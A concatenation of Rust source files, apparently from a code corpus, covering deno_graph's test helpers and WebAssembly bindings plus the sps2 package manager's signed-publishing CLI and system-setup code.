"== symbol deps (types and exprs) ==\n{}\n",
symbol_deps_text
));
}
let symbol_deps_text =
get_symbol_deps_text_for_mode(module, ResolveDepsMode::TypesOnly);
if !symbol_deps_text.is_empty() {
output_text.push_str(&format!(
"== symbol deps (types only) ==\n{}\n",
symbol_deps_text
));
}
// analyze the module graph for any problems
let diagnostics = check_fatal_diagnostics(module);
if !diagnostics.is_empty() {
eprintln!("== Output ==");
eprintln!("{}", module_output_text);
eprintln!("== Source ==");
eprintln!("{}", module.text());
eprintln!("== {} == \n\n{}", specifier, diagnostics.join("\n"));
panic!("FAILED");
}
}
let get_symbol_text =
|module_symbol: deno_graph::symbols::ModuleInfoRef,
symbol_id: deno_graph::symbols::SymbolId| {
let symbol = module_symbol.symbol(symbol_id).unwrap();
let items = root_symbol
.go_to_definitions_or_unresolveds(module_symbol, symbol)
.collect::<Vec<_>>();
if items.is_empty() {
"NONE".to_string()
} else {
let mut results = Vec::new();
for definition_or_unresolved in items {
match definition_or_unresolved {
DefinitionOrUnresolved::Definition(definition) => {
let decl_text = {
let decl_text = definition.text();
let lines = decl_text.split('\n').collect::<Vec<_>>();
if lines.len() > 4 {
lines[0..2]
.iter()
.chain(std::iter::once(&"..."))
.chain(&lines[lines.len() - 2..])
.cloned()
.collect::<Vec<_>>()
} else {
lines
}
.into_iter()
.map(|line| format!(" {}", line).trim_end().to_string())
.collect::<Vec<_>>()
.join("\n")
};
let range = definition.byte_range();
results.push(format!(
"{}:{}..{}\n{}",
definition.module.specifier(),
range.start,
range.end,
decl_text
));
}
DefinitionOrUnresolved::Unresolved(unresolved) => results
.push(format!(
"{}\n Unresolved {:?} ({:?})",
unresolved.module.specifier(),
unresolved.kind,
unresolved.parts,
)),
}
}
results.join("\n")
}
};
let exports = entrypoint_symbol.exports(&root_symbol).resolved;
if !exports.is_empty() {
output_text.push_str("== export definitions ==\n");
for (name, resolved) in exports {
let resolved = resolved.as_resolved_export();
let position = get_symbol_text(resolved.module, resolved.symbol_id);
output_text.push_str(&format!("[{}]: {}\n", name, position));
}
}
output_text
},
}
}
}
#[derive(Debug)]
struct WorkspaceMemberResolver {
members: Vec<WorkspaceMember>,
}
impl deno_graph::source::Resolver for WorkspaceMemberResolver {
fn resolve(
&self,
specifier_text: &str,
referrer_range: &deno_graph::Range,
_mode: deno_graph::source::ResolutionKind,
) -> Result<deno_ast::ModuleSpecifier, deno_graph::source::ResolveError> {
if let Ok(package_ref) = JsrPackageReqReference::from_str(specifier_text) {
for workspace_member in &self.members {
if workspace_member.name == package_ref.req().name
&& workspace_member
.version
.as_ref()
.map(|version| package_ref.req().version_req.matches(version))
.unwrap_or(true)
{
let export_name = package_ref.sub_path().unwrap_or(".");
let export = workspace_member.exports.get(export_name).unwrap();
return Ok(workspace_member.base.join(export).unwrap());
}
}
}
Ok(deno_graph::resolve_import(
specifier_text,
&referrer_range.specifier,
)?)
}
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/lib/lib.rs | lib/lib.rs | // Copyright 2018-2024 the Deno authors. MIT license.
// remove this after https://github.com/rustwasm/wasm-bindgen/issues/2774 is released
#![allow(clippy::unused_unit)]
#![deny(clippy::disallowed_methods)]
#![deny(clippy::disallowed_types)]
#![deny(clippy::unnecessary_wraps)]
use deno_error::JsErrorBox;
use deno_graph::resolve_import;
use deno_graph::source::load_data_url;
use deno_graph::source::CacheInfo;
use deno_graph::source::LoadFuture;
use deno_graph::source::LoadOptions;
use deno_graph::source::Loader;
use deno_graph::source::NullFileSystem;
use deno_graph::source::ResolutionKind;
use deno_graph::source::ResolveError;
use deno_graph::source::Resolver;
use deno_graph::source::DEFAULT_JSX_IMPORT_SOURCE_MODULE;
use deno_graph::BuildOptions;
use deno_graph::GraphKind;
use deno_graph::ModuleGraph;
use deno_graph::ModuleSpecifier;
use deno_graph::Range;
use deno_graph::ReferrerImports;
use deno_graph::SpecifierError;
use std::collections::HashMap;
use std::sync::Arc;
use futures::future;
use serde::Deserialize;
use serde::Serialize;
use wasm_bindgen::prelude::*;
#[derive(Debug, thiserror::Error, deno_error::JsError)]
#[class(generic)]
pub enum WasmError {
#[error("load rejected or errored")]
Load,
#[error("JavaScript resolve threw.")]
JavaScriptResolve,
#[error("JavaScript resolveTypes() function threw.")]
JavaScriptResolveTypes,
#[error("{0}")]
// String because serde_wasm_bindgen::Error is not thread-safe.
Deserialize(String),
}
pub struct JsLoader {
load: js_sys::Function,
maybe_cache_info: Option<js_sys::Function>,
}
impl JsLoader {
pub fn new(
load: js_sys::Function,
maybe_cache_info: Option<js_sys::Function>,
) -> Self {
Self {
load,
maybe_cache_info,
}
}
}
impl Loader for JsLoader {
fn get_cache_info(&self, specifier: &ModuleSpecifier) -> Option<CacheInfo> {
if let Some(cache_info_fn) = &self.maybe_cache_info {
let this = JsValue::null();
let arg0 = JsValue::from(specifier.to_string());
let value = cache_info_fn.call1(&this, &arg0).ok()?;
let cache_info: CacheInfo = serde_wasm_bindgen::from_value(value).ok()?;
Some(cache_info)
} else {
None
}
}
fn load(
&self,
specifier: &ModuleSpecifier,
options: LoadOptions,
) -> LoadFuture {
#[derive(Serialize)]
#[serde(rename_all = "camelCase")]
struct JsLoadOptions {
is_dynamic: bool,
cache_setting: &'static str,
checksum: Option<String>,
}
if specifier.scheme() == "data" {
Box::pin(future::ready(load_data_url(specifier).map_err(|err| {
deno_graph::source::LoadError::Other(Arc::new(JsErrorBox::from_err(
err,
)))
})))
} else {
let specifier = specifier.clone();
let context = JsValue::null();
let arg1 = JsValue::from(specifier.to_string());
let arg2 = serde_wasm_bindgen::to_value(&JsLoadOptions {
is_dynamic: options.in_dynamic_branch,
cache_setting: options.cache_setting.as_js_str(),
checksum: options.maybe_checksum.map(|c| c.into_string()),
})
.unwrap();
let result = self.load.call2(&context, &arg1, &arg2);
let f = async move {
let response = match result {
Ok(result) => {
wasm_bindgen_futures::JsFuture::from(js_sys::Promise::resolve(
&result,
))
.await
}
Err(err) => Err(err),
};
response
.map(|value| serde_wasm_bindgen::from_value(value).unwrap())
.map_err(|_| {
deno_graph::source::LoadError::Other(Arc::new(
JsErrorBox::from_err(WasmError::Load),
))
})
};
Box::pin(f)
}
}
}
#[derive(Debug)]
pub struct JsResolver {
maybe_default_jsx_import_source: Option<String>,
maybe_default_jsx_import_source_types: Option<String>,
maybe_jsx_import_source_module: Option<String>,
maybe_resolve: Option<js_sys::Function>,
maybe_resolve_types: Option<js_sys::Function>,
}
impl JsResolver {
pub fn new(
maybe_default_jsx_import_source: Option<String>,
maybe_default_jsx_import_source_types: Option<String>,
maybe_jsx_import_source_module: Option<String>,
maybe_resolve: Option<js_sys::Function>,
maybe_resolve_types: Option<js_sys::Function>,
) -> Self {
Self {
maybe_default_jsx_import_source,
maybe_default_jsx_import_source_types,
maybe_jsx_import_source_module,
maybe_resolve,
maybe_resolve_types,
}
}
}
#[derive(Debug, Deserialize, PartialEq, Eq)]
struct JsResolveTypesResponse {
types: ModuleSpecifier,
source: Option<Range>,
}
impl Resolver for JsResolver {
fn default_jsx_import_source(
&self,
_referrer: &ModuleSpecifier,
) -> Option<String> {
self.maybe_default_jsx_import_source.clone()
}
fn default_jsx_import_source_types(
&self,
_referrer: &ModuleSpecifier,
) -> Option<String> {
self.maybe_default_jsx_import_source_types.clone()
}
fn jsx_import_source_module(&self, _referrer: &ModuleSpecifier) -> &str {
self
.maybe_jsx_import_source_module
.as_deref()
.unwrap_or(DEFAULT_JSX_IMPORT_SOURCE_MODULE)
}
fn resolve(
&self,
specifier: &str,
referrer_range: &Range,
_kind: ResolutionKind,
) -> Result<ModuleSpecifier, ResolveError> {
if let Some(resolve) = &self.maybe_resolve {
let this = JsValue::null();
let arg1 = JsValue::from(specifier);
let arg2 = JsValue::from(referrer_range.specifier.to_string());
let value = match resolve.call2(&this, &arg1, &arg2) {
Ok(value) => value,
Err(_) => {
return Err(JsErrorBox::from_err(WasmError::JavaScriptResolve).into())
}
};
let value: String = match serde_wasm_bindgen::from_value(value) {
Ok(value) => value,
Err(err) => {
return Err(
JsErrorBox::from_err(WasmError::Deserialize(err.to_string()))
.into(),
)
}
};
ModuleSpecifier::parse(&value)
.map_err(|err| ResolveError::Specifier(SpecifierError::InvalidUrl(err)))
} else {
resolve_import(specifier, &referrer_range.specifier)
.map_err(|err| err.into())
}
}
fn resolve_types(
&self,
specifier: &ModuleSpecifier,
) -> Result<Option<(ModuleSpecifier, Option<Range>)>, ResolveError> {
if let Some(resolve_types) = &self.maybe_resolve_types {
let this = JsValue::null();
let arg1 = JsValue::from(specifier.to_string());
let value = resolve_types
.call1(&this, &arg1)
.map_err(|_| JsErrorBox::from_err(WasmError::JavaScriptResolveTypes))?;
let result: Option<JsResolveTypesResponse> =
serde_wasm_bindgen::from_value(value).map_err(|err| {
JsErrorBox::from_err(WasmError::Deserialize(err.to_string()))
})?;
Ok(result.map(|v| (v.types, v.source)))
} else {
Ok(None)
}
}
}
#[wasm_bindgen(js_name = createGraph)]
#[allow(clippy::too_many_arguments)]
pub async fn js_create_graph(
roots: JsValue,
load: js_sys::Function,
maybe_default_jsx_import_source: Option<String>,
maybe_default_jsx_import_source_types: Option<String>,
maybe_jsx_import_source_module: Option<String>,
maybe_cache_info: Option<js_sys::Function>,
maybe_resolve: Option<js_sys::Function>,
maybe_resolve_types: Option<js_sys::Function>,
maybe_graph_kind: Option<String>,
maybe_imports: JsValue,
) -> Result<JsValue, JsValue> {
console_error_panic_hook::set_once();
let roots_vec: Vec<String> = serde_wasm_bindgen::from_value(roots)
.map_err(|err| JsValue::from(js_sys::Error::new(&err.to_string())))?;
let maybe_imports_map: Option<HashMap<String, Vec<String>>> =
serde_wasm_bindgen::from_value(maybe_imports)
.map_err(|err| JsValue::from(js_sys::Error::new(&err.to_string())))?;
let loader = JsLoader::new(load, maybe_cache_info);
let maybe_resolver = if maybe_default_jsx_import_source.is_some()
|| maybe_default_jsx_import_source_types.is_some()
|| maybe_jsx_import_source_module.is_some()
|| maybe_resolve.is_some()
|| maybe_resolve_types.is_some()
{
Some(JsResolver::new(
maybe_default_jsx_import_source,
maybe_default_jsx_import_source_types,
maybe_jsx_import_source_module,
maybe_resolve,
maybe_resolve_types,
))
} else {
None
};
let mut roots = Vec::with_capacity(roots_vec.len());
for root in roots_vec.into_iter() {
let root = ModuleSpecifier::parse(&root)
.map_err(|err| JsValue::from(js_sys::Error::new(&err.to_string())))?;
roots.push(root);
}
let imports = if let Some(imports_map) = maybe_imports_map {
let mut imports = Vec::new();
for (referrer_str, specifier_vec) in imports_map.into_iter() {
let referrer = ModuleSpecifier::parse(&referrer_str)
.map_err(|err| JsValue::from(js_sys::Error::new(&err.to_string())))?;
imports.push(ReferrerImports {
referrer,
imports: specifier_vec,
});
}
imports
} else {
Vec::new()
};
let graph_kind = match maybe_graph_kind.as_deref() {
Some("typesOnly") => GraphKind::TypesOnly,
Some("codeOnly") => GraphKind::CodeOnly,
_ => GraphKind::All,
};
let mut graph = ModuleGraph::new(graph_kind);
graph
.build(
roots,
imports,
&loader,
BuildOptions {
is_dynamic: false,
skip_dynamic_deps: false,
unstable_bytes_imports: true,
unstable_text_imports: true,
resolver: maybe_resolver.as_ref().map(|r| r as &dyn Resolver),
// todo(dsherret): actually implement this for Wasm users
// and don't just use a RealSys here as it would be better
// to have a way for users to provide their own file system
// via the JS API.
file_system: &NullFileSystem,
jsr_version_resolver: Default::default(),
jsr_url_provider: Default::default(),
npm_resolver: None,
locker: None,
passthrough_jsr_specifiers: false,
module_analyzer: Default::default(),
module_info_cacher: Default::default(),
reporter: None,
executor: Default::default(),
jsr_metadata_store: None,
},
)
.await;
let serializer =
serde_wasm_bindgen::Serializer::new().serialize_maps_as_objects(true);
Ok(graph.serialize(&serializer).unwrap())
}
#[allow(clippy::too_many_arguments)]
#[wasm_bindgen(js_name = parseModule)]
pub async fn js_parse_module(
specifier: String,
maybe_headers: JsValue,
maybe_default_jsx_import_source: Option<String>,
maybe_default_jsx_import_types_source: Option<String>,
maybe_jsx_import_source_module: Option<String>,
content: Vec<u8>,
maybe_resolve: Option<js_sys::Function>,
maybe_resolve_types: Option<js_sys::Function>,
) -> Result<JsValue, JsValue> {
console_error_panic_hook::set_once();
let maybe_headers: Option<HashMap<String, String>> =
serde_wasm_bindgen::from_value(maybe_headers)
.map_err(|err| js_sys::Error::new(&err.to_string()))?;
let specifier = ModuleSpecifier::parse(&specifier)
.map_err(|err| js_sys::Error::new(&err.to_string()))?;
let maybe_resolver = if maybe_default_jsx_import_source.is_some()
|| maybe_default_jsx_import_types_source.is_some()
|| maybe_jsx_import_source_module.is_some()
|| maybe_resolve.is_some()
|| maybe_resolve_types.is_some()
{
Some(JsResolver::new(
maybe_default_jsx_import_source,
maybe_default_jsx_import_types_source,
maybe_jsx_import_source_module,
maybe_resolve,
maybe_resolve_types,
))
} else {
None
};
match deno_graph::parse_module(deno_graph::ParseModuleOptions {
graph_kind: GraphKind::All,
specifier,
maybe_headers,
mtime: None,
content: content.into(),
file_system: &NullFileSystem,
jsr_url_provider: Default::default(),
maybe_resolver: maybe_resolver.as_ref().map(|r| r as &dyn Resolver),
module_analyzer: Default::default(),
})
.await
{
Ok(module) => {
let serializer =
serde_wasm_bindgen::Serializer::new().serialize_maps_as_objects(true);
Ok(module.serialize(&serializer).unwrap())
}
Err(err) => Err(js_sys::Error::new(&err.to_string()).into()),
}
}
#[cfg(test)]
mod tests {
use super::*;
use deno_graph::PositionRange;
use serde_json::from_value;
use serde_json::json;
#[test]
fn test_deserialize_types_response() {
let actual: Option<JsResolveTypesResponse> = from_value(json!({
"types": "https://deno.land/x/mod.d.ts",
"source": {
"specifier": "file:///package.json"
}
}))
.unwrap();
assert_eq!(
actual,
Some(JsResolveTypesResponse {
types: ModuleSpecifier::parse("https://deno.land/x/mod.d.ts").unwrap(),
source: Some(Range {
specifier: ModuleSpecifier::parse("file:///package.json").unwrap(),
range: PositionRange::zeroed(),
resolution_mode: None,
})
})
);
let actual: Option<JsResolveTypesResponse> = from_value(json!({
"types": "https://deno.land/x/mod.d.ts",
}))
.unwrap();
assert_eq!(
actual,
Some(JsResolveTypesResponse {
types: ModuleSpecifier::parse("https://deno.land/x/mod.d.ts").unwrap(),
source: None
})
);
}
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sbs/src/main.rs | apps/sbs/src/main.rs | #![warn(mismatched_lifetime_syntaxes)]
#![deny(clippy::pedantic, unsafe_code)]
use clap::{Parser, Subcommand};
use sps2_errors::Error;
use sps2_repository::keys as repo_keys;
use sps2_repository::{LocalStore, Publisher};
use std::path::PathBuf;
#[derive(Parser, Debug)]
#[command(name = "sbs")]
#[command(version = env!("CARGO_PKG_VERSION"))]
#[command(about = "SPS2 build/publish tooling", long_about = None)]
struct Cli {
#[command(subcommand)]
command: Commands,
}
#[derive(Subcommand, Debug)]
enum Commands {
/// Publish a single package (.sp) into the repository and update the index
Publish {
/// Path to the .sp file
package: PathBuf,
/// Repository directory path (local filesystem)
#[arg(long, value_name = "DIR")]
repo_dir: PathBuf,
/// Base URL for download links in index (e.g., <http://localhost:8680>)
#[arg(long, value_name = "URL")]
base_url: String,
/// Minisign secret key path
#[arg(long, value_name = "PATH")]
key: PathBuf,
/// Optional passphrase or keychain string for minisign
#[arg(long)]
pass: Option<String>,
},
/// Rescan repo directory and rebuild+sign index
UpdateIndices {
/// Repository directory path (local filesystem)
#[arg(long, value_name = "DIR")]
repo_dir: PathBuf,
/// Base URL for download links in index
#[arg(long, value_name = "URL")]
base_url: String,
/// Minisign secret key path
#[arg(long, value_name = "PATH")]
key: PathBuf,
/// Optional passphrase or keychain string for minisign
#[arg(long)]
pass: Option<String>,
},
/// Initialize a repository with keys.json
RepoInit {
/// Repository directory path
#[arg(long, value_name = "DIR")]
repo_dir: PathBuf,
/// Use an existing Minisign public key file (.pub). If not provided, you can --generate.
#[arg(long, value_name = "PUBFILE")]
pubkey: Option<PathBuf>,
/// Generate a new key pair
#[arg(long, conflicts_with = "pubkey")]
generate: bool,
/// Output path for generated secret key (required with --generate)
#[arg(long, requires = "generate", value_name = "PATH")]
out_secret: Option<PathBuf>,
/// Output path for generated public key (required with --generate)
#[arg(long, requires = "generate", value_name = "PATH")]
out_public: Option<PathBuf>,
/// Optional comment to embed into keys.json
#[arg(long)]
comment: Option<String>,
},
}
#[tokio::main]
async fn main() -> Result<(), Error> {
init_tracing();
let cli = Cli::parse();
match cli.command {
Commands::Publish {
package,
repo_dir,
base_url,
key,
pass,
} => publish_one(package, repo_dir, base_url, key, pass).await?,
Commands::UpdateIndices {
repo_dir,
base_url,
key,
pass,
} => update_indices(repo_dir, base_url, key, pass).await?,
Commands::RepoInit {
repo_dir,
pubkey,
generate,
out_secret,
out_public,
comment,
} => {
let opts = RepoInitOpts {
repo_dir,
pubkey,
generate,
out_secret,
out_public,
pass: None,
unencrypted: false,
comment,
};
repo_init(opts).await?;
}
}
Ok(())
}
fn init_tracing() {
let _ = tracing_subscriber::fmt()
.with_env_filter(tracing_subscriber::EnvFilter::from_default_env())
.try_init();
}
async fn publish_one(
package: PathBuf,
repo_dir: PathBuf,
base_url: String,
key: PathBuf,
pass: Option<String>,
) -> Result<(), Error> {
// Copy .sp into repo dir
let filename = package
.file_name()
.and_then(|s| s.to_str())
.ok_or_else(|| Error::internal("invalid package filename"))?
.to_string();
let dest = repo_dir.join(&filename);
tokio::fs::create_dir_all(&repo_dir).await?;
tokio::fs::copy(&package, &dest).await?;
// Ensure .minisig exists; if not, create it by signing the package
let sig_path = repo_dir.join(format!("{filename}.minisig"));
// Resolve passphrase if needed (we'll reuse for index signing)
let mut pass_final = pass;
if !sig_path.exists() {
if pass_final.is_none() {
pass_final = maybe_prompt_pass(None, "Enter key passphrase (press Enter for none): ")?;
}
let data = tokio::fs::read(&dest).await?;
let sig = sps2_net::signing::minisign_sign_bytes(
&data,
&key,
pass_final.as_deref(),
Some("sps2 package signature"),
Some(&filename),
)?;
tokio::fs::write(&sig_path, sig).await?;
}
// Rebuild and sign index
update_indices(repo_dir, base_url, key, pass_final).await
}
async fn update_indices(
repo_dir: PathBuf,
base_url: String,
key: PathBuf,
pass: Option<String>,
) -> Result<(), Error> {
let pass_final = if pass.is_none() {
maybe_prompt_pass(
None,
"Enter key passphrase for signing index (press Enter for none): ",
)?
} else {
pass
};
let store = LocalStore::new(&repo_dir);
let publisher = Publisher::new(store, base_url);
let artifacts = publisher.scan_packages_local_dir(&repo_dir).await?;
let index = publisher.build_index(&artifacts);
publisher
.publish_index(&index, &key, pass_final.as_deref())
.await?;
println!(
"Updated index with {} packages in {}",
artifacts.len(),
repo_dir.display()
);
Ok(())
}
fn maybe_prompt_pass(current: Option<String>, prompt: &str) -> Result<Option<String>, Error> {
if current.is_some() {
return Ok(current);
}
let entered = rpassword::prompt_password(prompt)
.map_err(|e| Error::internal(format!("failed to read passphrase: {e}")))?;
if entered.is_empty() {
Ok(None)
} else {
Ok(Some(entered))
}
}
#[derive(Debug)]
struct RepoInitOpts {
repo_dir: PathBuf,
pubkey: Option<PathBuf>,
generate: bool,
out_secret: Option<PathBuf>,
out_public: Option<PathBuf>,
pass: Option<String>,
unencrypted: bool,
comment: Option<String>,
}
async fn repo_init(opts: RepoInitOpts) -> Result<(), Error> {
let RepoInitOpts {
repo_dir,
pubkey,
generate,
out_secret,
out_public,
pass,
unencrypted,
comment,
} = opts;
tokio::fs::create_dir_all(&repo_dir).await?;
let pk_base64 = if let Some(pub_path) = pubkey {
let content = tokio::fs::read_to_string(&pub_path).await?;
repo_keys::extract_base64(&content)
} else if generate {
// Generate keypair; encrypt secret key unless --unencrypted
use minisign::KeyPair;
let KeyPair { pk, sk } = KeyPair::generate_unencrypted_keypair()
.map_err(|e| Error::internal(format!("keypair generation failed: {e}")))?;
// Write secret key
let sk_path = out_secret.expect("out_secret required with --generate");
let passphrase = if unencrypted {
eprintln!(
"WARNING: writing UNENCRYPTED secret key to {}. This is unsafe; use only for throwaway local testing.",
sk_path.display()
);
None
} else if let Some(p) = pass {
Some(p)
} else {
let p1 = rpassword::prompt_password("Enter new key passphrase: ")
.map_err(|e| Error::internal(format!("failed to read passphrase: {e}")))?;
let p2 = rpassword::prompt_password("Repeat passphrase: ")
.map_err(|e| Error::internal(format!("failed to read passphrase: {e}")))?;
if p1 != p2 {
return Err(Error::internal("passphrases do not match"));
}
if p1.len() < 8 {
eprintln!("WARNING: passphrase is short; consider 12+ characters");
}
Some(p1)
};
let sk_box = sk
.to_box(passphrase.as_deref())
.map_err(|e| Error::internal(format!("secret key serialize failed: {e}")))?;
tokio::fs::write(&sk_path, sk_box.to_string()).await?;
// Write public key
let pk_path = out_public.expect("out_public required with --generate");
let pk_box = pk
.to_box()
.map_err(|e| Error::internal(format!("public key serialize failed: {e}")))?;
tokio::fs::write(&pk_path, pk_box.to_string()).await?;
// Extract base64 from box
repo_keys::extract_base64(&pk_box.to_string())
} else {
return Err(Error::internal(
"Provide --pubkey <file> or --generate with --out-secret/--out-public",
));
};
let repo = repo_keys::make_single_key(pk_base64, comment)?;
repo_keys::write_keys_json(&repo_dir, &repo).await?;
println!("Initialized repo at {} with keys.json", repo_dir.display());
Ok(())
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sps2/src/setup.rs | apps/sps2/src/setup.rs | //! System setup and initialization
use crate::error::CliError;
use sps2_builder::Builder;
use sps2_config::{fixed_paths, Config};
use sps2_index::IndexManager;
use sps2_net::NetClient;
use sps2_resolver::Resolver;
use sps2_state::StateManager;
use sps2_store::PackageStore;
use std::path::{Path, PathBuf};
use tracing::{debug, info, warn};
/// System setup and component initialization
pub struct SystemSetup {
config: Config,
store: Option<PackageStore>,
state: Option<StateManager>,
index: Option<IndexManager>,
net: Option<NetClient>,
resolver: Option<Resolver>,
builder: Option<Builder>,
}
impl SystemSetup {
/// Create new system setup
pub fn new(config: Config) -> Self {
Self {
config,
store: None,
state: None,
index: None,
net: None,
resolver: None,
builder: None,
}
}
/// Initialize all system components
pub async fn initialize(&mut self) -> Result<(), CliError> {
info!("Initializing sps2 system components");
// Check and create system directories
self.ensure_system_directories().await?;
// Initialize core components
self.init_store().await?;
self.init_state().await?;
self.init_index().await?;
self.init_net().await?;
self.init_resolver().await?;
self.init_builder().await?;
// Initialize platform cache for optimized tool discovery
self.init_platform_cache().await?;
// Perform startup maintenance
self.startup_maintenance().await?;
info!("System initialization completed");
Ok(())
}
/// Get package store
pub fn store(&self) -> &PackageStore {
self.store.as_ref().expect("store not initialized")
}
/// Get state manager
pub fn state(&self) -> &StateManager {
self.state.as_ref().expect("state not initialized")
}
/// Get index manager
pub fn index(&self) -> &IndexManager {
self.index.as_ref().expect("index not initialized")
}
/// Get network client
pub fn net(&self) -> &NetClient {
self.net.as_ref().expect("net not initialized")
}
/// Get resolver
pub fn resolver(&self) -> &Resolver {
self.resolver.as_ref().expect("resolver not initialized")
}
/// Get builder
pub fn builder(&self) -> Builder {
self.builder
.as_ref()
.expect("builder not initialized")
.clone()
}
/// Ensure required system directories exist
async fn ensure_system_directories(&self) -> Result<(), CliError> {
let required_dirs = [
fixed_paths::PREFIX,
fixed_paths::STORE_DIR,
fixed_paths::STATES_DIR,
fixed_paths::LIVE_DIR,
fixed_paths::LOGS_DIR,
fixed_paths::KEYS_DIR,
];
for dir in &required_dirs {
let path = Path::new(dir);
if !path.exists() {
debug!("Creating directory: {}", dir);
tokio::fs::create_dir_all(path)
.await
.map_err(|e| CliError::Setup(format!("Failed to create {dir}: {e}")))?;
}
}
// Seed default repositories and keys on first run
self.seed_default_repositories_and_keys().await?;
// Check permissions on critical paths
self.check_permissions().await?;
Ok(())
}
/// Seed default repositories and embedded public keys on first run
async fn seed_default_repositories_and_keys(&self) -> Result<(), CliError> {
use sps2_config::fixed_paths;
use tokio::fs;
// Initialize repos in config if empty
// For now, write defaults into config file only if none are present
// Embedded public key placeholder (replace with real key for production)
let bootstrap_key = "RWSGOq2NVecA2UPNdBUZykp1MLhfMmkAK/SZSjK3bpq2q7I8LbSVVBDm".to_string();
// Ensure keys dir exists
fs::create_dir_all(fixed_paths::KEYS_DIR)
.await
.map_err(|e| CliError::Setup(format!("Failed to create keys dir: {e}")))?;
// Initialize trusted_keys.json if missing using KeyManager (ensures correct key_id)
let keys_file = std::path::Path::new(fixed_paths::KEYS_DIR).join("trusted_keys.json");
if !keys_file.exists() {
let mut key_manager =
sps2_ops::keys::KeyManager::new(std::path::PathBuf::from(fixed_paths::KEYS_DIR));
key_manager
.initialize_with_bootstrap(&bootstrap_key)
.await
.map_err(|e| CliError::Setup(format!("Failed to initialize bootstrap key: {e}")))?;
}
Ok(())
}
/// Check permissions on system directories
async fn check_permissions(&self) -> Result<(), CliError> {
let paths_to_check = [
fixed_paths::PREFIX,
fixed_paths::STORE_DIR,
fixed_paths::STATES_DIR,
fixed_paths::LIVE_DIR,
];
for path in &paths_to_check {
let metadata = tokio::fs::metadata(path)
.await
.map_err(|e| CliError::Setup(format!("Cannot access {path}: {e}")))?;
// Check if we can write to the directory
if metadata.permissions().readonly() {
return Err(CliError::Setup(format!("No write permission for {path}")));
}
}
Ok(())
}
/// Initialize package store
async fn init_store(&mut self) -> Result<(), CliError> {
debug!("Initializing package store");
let store_path = Path::new(fixed_paths::STORE_DIR);
let store = PackageStore::new(store_path.to_path_buf());
self.store = Some(store);
Ok(())
}
/// Initialize state manager
async fn init_state(&mut self) -> Result<(), CliError> {
debug!("Initializing state manager");
let state_path = Path::new(fixed_paths::PREFIX);
let state = StateManager::new(state_path)
.await
.map_err(|e| CliError::Setup(format!("Failed to initialize state: {e}")))?;
self.state = Some(state);
Ok(())
}
/// Initialize index manager
async fn init_index(&mut self) -> Result<(), CliError> {
debug!("Initializing index manager");
let cache_path = Path::new(fixed_paths::PREFIX);
let mut index = IndexManager::new(cache_path);
// Try to load cached index
match index.load(None).await {
Ok(()) => {
debug!("Loaded cached index");
}
Err(e) => {
warn!("Failed to load cached index, will need reposync: {}", e);
// Create empty index for now
let empty_index = sps2_index::Index::new();
let json = empty_index
.to_json()
.map_err(|e| CliError::Setup(format!("Failed to create empty index: {e}")))?;
index
.load(Some(&json))
.await
.map_err(|e| CliError::Setup(format!("Failed to load empty index: {e}")))?;
}
}
self.index = Some(index);
Ok(())
}
/// Initialize network client
async fn init_net(&mut self) -> Result<(), CliError> {
debug!("Initializing network client");
// Create NetConfig from our configuration
let net_config = sps2_net::NetConfig {
timeout: std::time::Duration::from_secs(self.config.network.timeout),
connect_timeout: std::time::Duration::from_secs(30),
pool_idle_timeout: std::time::Duration::from_secs(90),
pool_max_idle_per_host: 10,
retry_count: self.config.network.retries,
retry_delay: std::time::Duration::from_secs(self.config.network.retry_delay),
user_agent: format!("sps2/{}", env!("CARGO_PKG_VERSION")),
};
let net = sps2_net::NetClient::new(net_config)
.map_err(|e| CliError::Setup(format!("Failed to create network client: {e}")))?;
self.net = Some(net);
Ok(())
}
/// Initialize resolver
async fn init_resolver(&mut self) -> Result<(), CliError> {
debug!("Initializing resolver");
let index = self.index.as_ref().unwrap().clone();
let resolver = Resolver::new(index);
self.resolver = Some(resolver);
Ok(())
}
/// Initialize builder
async fn init_builder(&mut self) -> Result<(), CliError> {
debug!("Initializing builder");
let net = self.net.as_ref().unwrap().clone();
let builder = Builder::new().with_net(net);
self.builder = Some(builder);
Ok(())
}
/// Initialize platform cache
async fn init_platform_cache(&mut self) -> Result<(), CliError> {
debug!("Initializing platform cache");
// Initialize the platform manager's cache from persistent storage
let platform_manager = sps2_platform::core::PlatformManager::instance();
platform_manager
.initialize_cache()
.await
.map_err(|e| CliError::Setup(format!("Failed to initialize platform cache: {e}")))?;
debug!("Platform cache initialized successfully");
Ok(())
}
/// Perform startup maintenance tasks
async fn startup_maintenance(&mut self) -> Result<(), CliError> {
debug!("Performing startup maintenance");
// Check if garbage collection is needed (>7 days since last GC)
let state = self.state.as_ref().unwrap();
if self.should_run_startup_gc(state).await? {
info!("Running startup garbage collection");
// Clean up old states using configured retention count
let cleaned_states = state
.cleanup_old_states(self.config.state.retention_count)
.await
.map_err(|e| CliError::Setup(format!("Startup GC failed: {e}")))?;
// Clean up orphaned packages
let store = self.store.as_ref().unwrap();
let cleaned_packages = store
.garbage_collect()
.map_err(|e| CliError::Setup(format!("Startup GC failed: {e}")))?;
if !cleaned_states.is_empty() || cleaned_packages > 0 {
info!(
"Startup GC: cleaned {} states and {} packages",
cleaned_states.len(),
cleaned_packages
);
}
// Update GC timestamp after successful cleanup
self.write_last_gc_timestamp().await?;
}
// Clean orphaned staging directories
self.clean_orphaned_staging().await?;
Ok(())
}
/// Check if startup GC should run
async fn should_run_startup_gc(&self, _state: &StateManager) -> Result<bool, CliError> {
// Check if last GC was >7 days ago by reading timestamp file
match self.read_last_gc_timestamp().await {
Ok(last_gc) => {
let now = std::time::SystemTime::now()
.duration_since(std::time::UNIX_EPOCH)
.unwrap_or_default()
.as_secs();
let seven_days_ago = now.saturating_sub(7 * 24 * 60 * 60);
Ok(last_gc < seven_days_ago)
}
Err(_) => {
// If we can't read the timestamp file, assume GC is needed
debug!("No GC timestamp found, running startup GC");
Ok(true)
}
}
}
/// Clean up orphaned staging directories (only safe to remove)
